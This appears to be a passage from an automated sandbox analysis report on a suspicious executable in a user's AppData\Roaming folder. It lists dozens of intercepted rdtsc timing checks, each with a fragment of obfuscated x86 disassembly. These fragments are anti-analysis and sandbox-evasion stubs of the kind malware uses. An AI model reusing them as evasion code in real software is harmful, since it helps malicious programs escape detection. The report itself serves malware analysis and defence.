0x0000004d call 00007F5828704A68h 0x00000052 pop edi 0x00000053 mov dword ptr [esp+04h], edi 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc edi 0x00000060 push edi 0x00000061 ret 0x00000062 pop edi 0x00000063 ret 0x00000064 jnl 00007F5828704A6Eh 0x0000006a push FFFFFFFFh 0x0000006c mov edi, dword ptr [ebp+1246E7C2h] 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F5828704A6Fh 0x0000007a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96E9D0 second address: 96E9D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97180A second address: 97180F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 970988 second address: 970992 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5828CEC30Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 970992 second address: 970A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e je 00007F5828704A6Ch 0x00000014 jnl 00007F5828704A66h 0x0000001a sbb ebx, 1B4BFD3Ah 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F5828704A68h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 mov eax, dword ptr [ebp+122D0421h] 0x00000047 jne 00007F5828704A6Ch 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007F5828704A68h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 00000018h 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 xor ebx, 3F829395h 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007F5828704A6Fh 0x00000077 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9727E0 second address: 9727F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828CEC314h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9727F8 second address: 972828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2388h], edi 0x00000011 push 00000000h 0x00000013 add bx, 57CBh 0x00000018 xor ebx, dword ptr [ebp+122D2964h] 0x0000001e push 00000000h 0x00000020 jnp 00007F5828704A69h 0x00000026 xchg eax, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 972828 second address: 97282C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97282C second address: 972830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9718FB second address: 971902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 972830 second address: 972836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 972836 second address: 972845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828CEC30Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 972845 second address: 972853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 972853 second address: 972857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 972857 second address: 972861 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9739EB second address: 9739F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9739F1 second address: 973A21 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5828704A75h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5828704A74h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 973A21 second address: 973A26 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 976DB0 second address: 976DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A75h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 976DC9 second address: 976DDB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 976DDB second address: 976DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 976DE2 second address: 976E5D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5828CEC308h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+12449762h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F5828CEC308h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f push edx 0x00000030 or edi, 25FA20FFh 0x00000036 pop ebx 0x00000037 push 00000000h 0x00000039 jmp 00007F5828CEC30Ch 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jmp 00007F5828CEC311h 0x00000047 jmp 00007F5828CEC317h 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 976E5D second address: 976E64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 976E64 second address: 976E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 976E71 second address: 976E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 976E76 second address: 976E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 977E32 second address: 977E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F5828704A6Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97E5CF second address: 97E5E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC314h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97A77C second address: 97A79B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5828704A6Ch 0x00000008 jc 00007F5828704A66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F5828704A6Ch 0x00000019 jnc 00007F5828704A66h 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9805FA second address: 9805FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97B744 second address: 97B74A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 98822D second address: 988254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828CEC316h 0x00000009 jmp 00007F5828CEC30Dh 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 987DAF second address: 987DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 98D700 second address: 98D704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 98D704 second address: 98D747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F5828704A74h 0x0000000d push ebx 0x0000000e jnp 00007F5828704A66h 0x00000014 pop ebx 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007F5828704A72h 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 push ebx 0x00000024 pushad 0x00000025 popad 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 98D860 second address: 98D865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 98D865 second address: 98D8AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828704A73h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007F5828704A70h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5828704A77h 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 98D8AF second address: 7BEA92 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5828CEC308h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e add cx, A55Fh 0x00000013 popad 0x00000014 push dword ptr [ebp+122D1685h] 0x0000001a jns 00007F5828CEC309h 0x00000020 pushad 0x00000021 cld 0x00000022 popad 0x00000023 call dword ptr [ebp+122D389Ah] 0x00000029 pushad 0x0000002a jns 00007F5828CEC31Dh 0x00000030 pushad 0x00000031 jmp 00007F5828CEC315h 0x00000036 popad 0x00000037 xor eax, eax 0x00000039 add dword ptr [ebp+122D1A4Ch], ecx 0x0000003f mov edx, dword ptr [esp+28h] 0x00000043 pushad 0x00000044 mov dword ptr [ebp+122D1EFAh], edi 0x0000004a popad 0x0000004b mov dword ptr [ebp+122D29CCh], eax 0x00000051 js 00007F5828CEC312h 0x00000057 sub dword ptr [ebp+122D1F2Ch], ecx 0x0000005d mov esi, 0000003Ch 0x00000062 cld 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 mov dword ptr [ebp+122D1A4Ch], esi 0x0000006d lodsw 0x0000006f jmp 00007F5828CEC318h 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 clc 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d stc 0x0000007e push eax 0x0000007f push esi 0x00000080 push eax 0x00000081 push edx 0x00000082 pushad 0x00000083 popad 0x00000084 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 993176 second address: 993187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5828704A66h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 993187 second address: 99318B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9929F7 second address: 9929FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9929FC second address: 992A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 992A02 second address: 992A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 992A08 second address: 992A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 992B62 second address: 992B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5828704A71h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 992B86 second address: 992B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F5828CEC306h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 992B9A second address: 992BAE instructions: 0x00000000 rdtsc 0x00000002 je 00007F5828704A66h 0x00000008 js 00007F5828704A66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 992BAE second address: 992BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 992BB2 second address: 992BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 992BB8 second address: 992BC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F5828CEC306h 0x00000009 jbe 00007F5828CEC306h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 993009 second address: 99300D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99300D second address: 993016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 993016 second address: 99301B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97B7F3 second address: 97B810 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828CEC318h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97C762 second address: 97C766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97E886 second address: 97E88A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 923EB2 second address: 923ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5828704A75h 0x0000000b jl 00007F5828704A66h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 923ED3 second address: 923EDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 923EDD second address: 923EE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96B28F second address: 96B296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97F66B second address: 97F685 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jns 00007F5828704A6Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96B296 second address: 94BEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F5828CEC308h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D278Ch], ebx 0x00000028 call dword ptr [ebp+122D3874h] 0x0000002e push ecx 0x0000002f jmp 00007F5828CEC30Ah 0x00000034 pop ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F5828CEC30Bh 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f pop eax 0x00000040 jmp 00007F5828CEC318h 0x00000045 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96B7FA second address: 96B7FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96B7FE second address: 7BEA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 or dword ptr [ebp+1246E724h], eax 0x0000000e push dword ptr [ebp+122D1685h] 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F5828CEC308h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D24A2h], ecx 0x00000034 call dword ptr [ebp+122D389Ah] 0x0000003a pushad 0x0000003b jns 00007F5828CEC31Dh 0x00000041 xor eax, eax 0x00000043 add dword ptr [ebp+122D1A4Ch], ecx 0x00000049 mov edx, dword ptr [esp+28h] 0x0000004d pushad 0x0000004e mov dword ptr [ebp+122D1EFAh], edi 0x00000054 popad 0x00000055 mov dword ptr [ebp+122D29CCh], eax 0x0000005b js 00007F5828CEC312h 0x00000061 sub dword ptr [ebp+122D1F2Ch], ecx 0x00000067 mov esi, 0000003Ch 0x0000006c cld 0x0000006d add esi, dword ptr [esp+24h] 0x00000071 mov dword ptr [ebp+122D1A4Ch], esi 0x00000077 lodsw 0x00000079 jmp 00007F5828CEC318h 0x0000007e add eax, dword ptr [esp+24h] 0x00000082 clc 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 stc 0x00000088 push eax 0x00000089 push esi 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d popad 0x0000008e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96BB0A second address: 96BB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], esi 0x00000009 sbb edx, 0589A7FFh 0x0000000f nop 0x00000010 je 00007F5828704A74h 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F5828704A66h 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 98080F second address: 980834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC30Ch 0x00000009 popad 0x0000000a jg 00007F5828CEC308h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007F5828CEC306h 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 980834 second address: 98083E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96BDEC second address: 96BE5D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F5828CEC308h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007F5828CEC308h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 pushad 0x00000045 mov cl, B4h 0x00000047 mov edi, ebx 0x00000049 popad 0x0000004a nop 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jng 00007F5828CEC306h 0x00000054 jmp 00007F5828CEC30Dh 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C556 second address: 96C55B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C5F5 second address: 96C60E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F5828CEC308h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F5828CEC306h 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C60E second address: 96C618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C618 second address: 96C61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C61C second address: 96C69A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F5828704A68h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 pushad 0x00000027 jmp 00007F5828704A6Ch 0x0000002c mov edi, dword ptr [ebp+122D1A3Eh] 0x00000032 popad 0x00000033 mov edi, dword ptr [ebp+122D1994h] 0x00000039 pushad 0x0000003a mov eax, dword ptr [ebp+122D23CDh] 0x00000040 mov si, di 0x00000043 popad 0x00000044 lea eax, dword ptr [ebp+1247FFF4h] 0x0000004a jmp 00007F5828704A70h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F5828704A72h 0x00000057 rdtsc
